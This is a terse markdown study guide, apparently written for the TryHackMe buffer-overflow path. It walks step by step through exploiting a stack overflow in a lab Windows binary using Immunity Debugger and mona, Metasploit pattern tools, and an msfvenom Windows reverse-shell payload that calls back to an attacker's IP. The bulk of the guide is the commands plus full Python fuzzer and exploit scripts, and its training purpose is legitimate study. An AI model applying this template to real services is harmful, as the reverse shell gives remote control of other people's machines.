# point n shoot
ref: TRY HACK ME BOF PATH\
\
connect to remote windows box
### How to RDP into windows ?
```
xfreerdp /u:admin /p:password /cert:ignore /v:MACHINE_IP /workarea
```
### Exploitation
Step 1: Start immunity with admin permissions.\
Step 2: Attach or open the desired application and put it into running state
binary opens in a paused state ;
### How to set working path in Immunity Debugger ?
```
!mona config -set workingfolder c:\mona\%p
```
### On Attacker Machine aka Kali
Step 1: Do Port Scan and Identify Target Port\
Step 2: nc ip port\
and check out the command options ; modify fuzzer script prefix accordingly\
Step 3: run the fuzzer ; wait for it to give you the crashing bytes add 400 to the no.\
python fuzzer.py\
for example program crached at 200 bytes\
\
Step 4: usr share metasploit tools exploit pattern create -l 600
### /usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 600
\
\
Step 5: modify exploit py and put the pattern in overflow variable ; run the script ; observe the EIP\
### !mona findmsp -distance 600
\
\
basically the length of pattern you created\
this will output you the offset\
you can double check it with follwing ::\
└─$ /usr/share/metasploit-framework/tools/exploit/pattern\_offset.rb -q 76413176\
^^ value of eip after crash with pattern\
\
\
Step 6: Confirm Offset\
by setting offset value in exploit py sending length of A\
follwed by retn or eip value as “BBBB”\
pbserve eip 42424242\
if true the offset is correct\
\
Step 7: Find Bad Chars \[ the fastest n easiest way ]\
generate a byte array excluding null byte\
null byte is always a bad char\
### !mona bytearray -b "\x00"
\
\
use python script to generate a badchar on attacking machine as well Check appendix\
\
now send the byte array in payload section of python exploit ...\
\
crash and then check for badchars\
crach and check the value of esp = \[copy this value]\
and run this command to check bad chars
### !mona compare -f C:\mona\oscp\bytearray.bin -a \
### !mona compare -f C:\mona\oscp\bytearray.bin -a
0188FA30\
esp = 0188FA30\
\
only keep the first char if badchars are in consecutive sequence .\
\
rinse n repeat\
update the payload variable and remove the new badchars from the py exploit\
create new badcahr array using mona module again\
### !mona bytearray -b “\x00\x23\x3c\x83\xba”
\
\
rerun the exploit -→ crash the app --> and again check the esp and re run the follwing\
\
### !mona compare -f C:\mona\oscp\bytearray.bin -a \
### !mona compare -f C:\mona\oscp\bytearray.bin -a
0193FA30\
\
\
Find jmp esp\
after crashing or before crashing \[does not matter ] mention all your badchars after -cpb paramter\
### !mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"
\
^^^^here goes all your badchars\
\
keep a address of jmp esp -→ save it in reverse order in retn / eip value in exploit .py\
\
generate your shell code using msfvenom\
### msfvenom -p windows/shell\_reverse\_tcp LHOST=YOUR\_IP LPORT=4444 EXITFUNC=thread -b "\x00morehere" -f c
\
\
paste the output in payload section like\
payload = ("adfadfa"\
“adadfa”\
“afdawfda”\
“awdfawdf”)\
\
set nops somewhere between 12-16-20\
nop = “\x90” \* 16\
\
\
Fuzzer python3 script\
\---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---\
\
\#!/usr/bin/env python3\
\
import socket, time, sys\
\
ip = "MACHINE\_IP"\
\
port = 1337\
timeout = 5\
prefix = "OVERFLOW1 "\
\
string = prefix + "A" \* 100\
\
while True:\
try:\
with socket.socket(socket.AF\_INET, socket.SOCK\_STREAM) as s:\
s.settimeout(timeout)\
s.connect((ip, port))\
s.recv(1024)\
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))\
s.send(bytes(string, "latin-1"))\
s.recv(1024)\
except:\
print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))\
sys.exit(0)\
string += 100 \* "A"\
time.sleep(1)\
\
\---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---\
Exploit.py\
\---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---\
\#!/usr/bin/env python3\
import socket\
\
ip = "MACHINE\_IP"\
port = 1337\
\
prefix = "OVERFLOW1 "\
offset = 0\
\#this is your junk\
overflow = "A" \* offset\
\#this is eip enter it in reverse\
retn = ""\
\#this is nop sledge\
padding = ""\
\#here goes your shellcode in c format\
payload = ""\
\#remaining bytes from total\
postfix = ""\
\
buffer = prefix + overflow + retn + padding + payload + postfix\
\
s = socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)\
\
try:\
s.connect((ip, port))\
print("Sending evil buffer...")\
s.send(bytes(buffer + "\r\n", "latin-1"))\
print("Done!")\
except:\
print("Could not connect.")\
\
\---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---\
python badchar create\
\---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---\
\
for x in range(1, 256):\
print("\\\x" + "{:02x}".format(x), end='')\
print()\
\
\---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---